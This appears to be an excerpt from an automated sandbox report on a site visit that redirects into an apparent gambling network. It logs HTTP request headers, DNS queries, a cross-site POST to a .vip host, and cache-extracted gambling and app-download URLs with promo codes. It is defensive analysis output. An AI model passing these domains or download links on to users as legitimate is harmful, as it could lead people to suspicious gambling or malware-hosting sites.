Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/urlencode.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/main.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/blue-bg.jpg HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://p3yw7u.innittapp.com/061410/rcenter/common/themes/error.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/bet-ico-bg.png HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://p3yw7u.innittapp.com/061410/rcenter/common/themes/error.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/ico-605.png HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/urlencode.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap/bootstrap.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap/bootstrap.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/blue-bg.jpg HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/jquery-2.1.1.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/images/errors/bet-ico-bg.png HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/components/selectPure.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/home/TopPage.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/errors/templateWrap.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/jquery-2.1.1.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap-dialog/bootstrap-dialog.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl/loader/legacy.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap-daterangepicker/moment.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/components/selectPure.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/home/TopPage.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/errors/templateWrap.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl/loader/legacy.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap-dialog/bootstrap-dialog.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/bootstrap-daterangepicker/moment.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery-eventlock/jquery-eventlock-1.0.0.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl/plugin/css.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/themes/default/jquery/plugins/jquery.poshytip/poshytip.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/curl/curl/plugin/css.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery-eventlock/jquery-eventlock-1.0.0.js?v=1736150851437 HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://551000l.cc/live.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=31b5452c7ebd24ef97de659f4fb68f7c
Source: global trafficHTTP traffic detected: GET /errors/404.html HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/html, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://551000l.cc/live.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=31b5452c7ebd24ef97de659f4fb68f7c; _LANGUAGE=zh_CN
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: m.ccsurj.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_220.2.drString found in binary or memory: img.src = `https://www.facebook.com/tr?id=${fpixelid}&ev=PageView&noscript=1`; equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: m.ccsurj.org
Source: global trafficDNS traffic detected: DNS query: www.ccsurj.org
Source: global trafficDNS traffic detected: DNS query: vkg.hpdbfezgrqwn.vip
Source: global trafficDNS traffic detected: DNS query: www.baidu.com
Source: global trafficDNS traffic detected: DNS query: www.sogou.com
Source: global trafficDNS traffic detected: DNS query: 1k4ej4j1lxvjwz.com
Source: global trafficDNS traffic detected: DNS query: p.ssl.qhimg.com
Source: global trafficDNS traffic detected: DNS query: 551000l.cc
Source: global trafficDNS traffic detected: DNS query: p3yw7u.innittapp.com
Source: unknownHTTP traffic detected: POST /wdzmr.php HTTP/1.1Host: vkg.hpdbfezgrqwn.vipConnection: keep-aliveContent-Length: 189sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8;Accept: */*Origin: https://www.ccsurj.orgSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ccsurj.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
Source: chromecache_149.2.drString found in binary or memory: http://12aff.best5689.com/92043302/signup/cs/index.html
Source: chromecache_149.2.drString found in binary or memory: http://5887ky.com
Source: chromecache_349.2.dr, chromecache_236.2.drString found in binary or memory: http://james.padolsey.com)
Source: chromecache_196.2.dr, chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: http://kaiyunty583.net
Source: chromecache_268.2.dr, chromecache_194.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_347.2.drString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: chromecache_149.2.drString found in binary or memory: https://0326018.cc
Source: chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://11073377.app
Source: chromecache_351.2.drString found in binary or memory: https://1k4ej4j1lxvjwz.com/
Source: chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://551000l.cc
Source: chromecache_196.2.dr, chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://665339c.com
Source: chromecache_149.2.drString found in binary or memory: https://665339c.com/wap/downloadApp?promoCode=e9VJBL
Source: chromecache_196.2.dr, chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://789400.cc/
Source: chromecache_149.2.drString found in binary or memory: https://99505n.cc
Source: chromecache_149.2.drString found in binary or memory: https://a43389.cc/
Source: chromecache_149.2.drString found in binary or memory: https://aff.kkcg8.com/sign-up/593325
Source: chromecache_220.2.drString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
Source: chromecache_149.2.drString found in binary or memory: https://app.geqianf225.top/s/bet365
Source: chromecache_149.2.drString found in binary or memory: https://app.geqianf225.top/s/bwyz
Source: chromecache_149.2.drString found in binary or memory: https://app.geqianf225.top/s/tyc
Source: chromecache_149.2.drString found in binary or memory: https://appiso-ali.ghgdfdf.com/?cGkxMl90NDA3MQ==&c=101105706293#/
Source: chromecache_149.2.drString found in binary or memory: https://cdn.livechatinc.com/tracking.js
Source: chromecache_220.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_196.2.dr, chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://e977110.com
Source: chromecache_149.2.drString found in binary or memory: https://e977110.com/wap/downloadApp?promoCode=pK8XQc
Source: chromecache_290.2.dr, chromecache_197.2.dr, chromecache_225.2.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_290.2.dr, chromecache_197.2.dr, chromecache_225.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_290.2.dr, chromecache_225.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_149.2.drString found in binary or memory: https://guwu.fun/download
Source: chromecache_204.2.drString found in binary or memory: https://j21716.com
Source: chromecache_149.2.drString found in binary or memory: https://j21716.com/wap/downloadApp?promoCode=XPMJTR
Source: chromecache_196.2.dr, chromecache_149.2.dr, chromecache_204.2.drString found in binary or memory: https://k933005.com
Source: chromecache_149.2.drString found in binary or memory: https://lucky298.com/vsgl
Source: chromecache_196.2.dr, chromecache_204.2.drString found in binary or memory: https://lucky298.com/vsglat
Source: chromecache_204.2.drString found in binary or memory: https://m399227.com
Source: chromecache_347.2.drString found in binary or memory: https://p.ssl.qhimg.com/t010e288a56a0b005e9.png
Source: chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common
Source: chromecache_166.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/images/errors/ico-605.png
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/js/curl/curl.js
Source: chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.j
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/main.js
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/urlencode.js
Source: chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate
Source: chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/static/css/gb.validation.min.css
Source: chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/static/js/gb.validation.min.js?v=1736150851437
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css
Source: chromecache_166.2.dr, chromecache_300.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/common/themes/error.css
Source: chromecache_166.2.dr, chromecache_300.2.dr, chromecache_220.2.drString found in binary or memory: https://p3yw7u.innittapp.com/061410/rcenter/msites
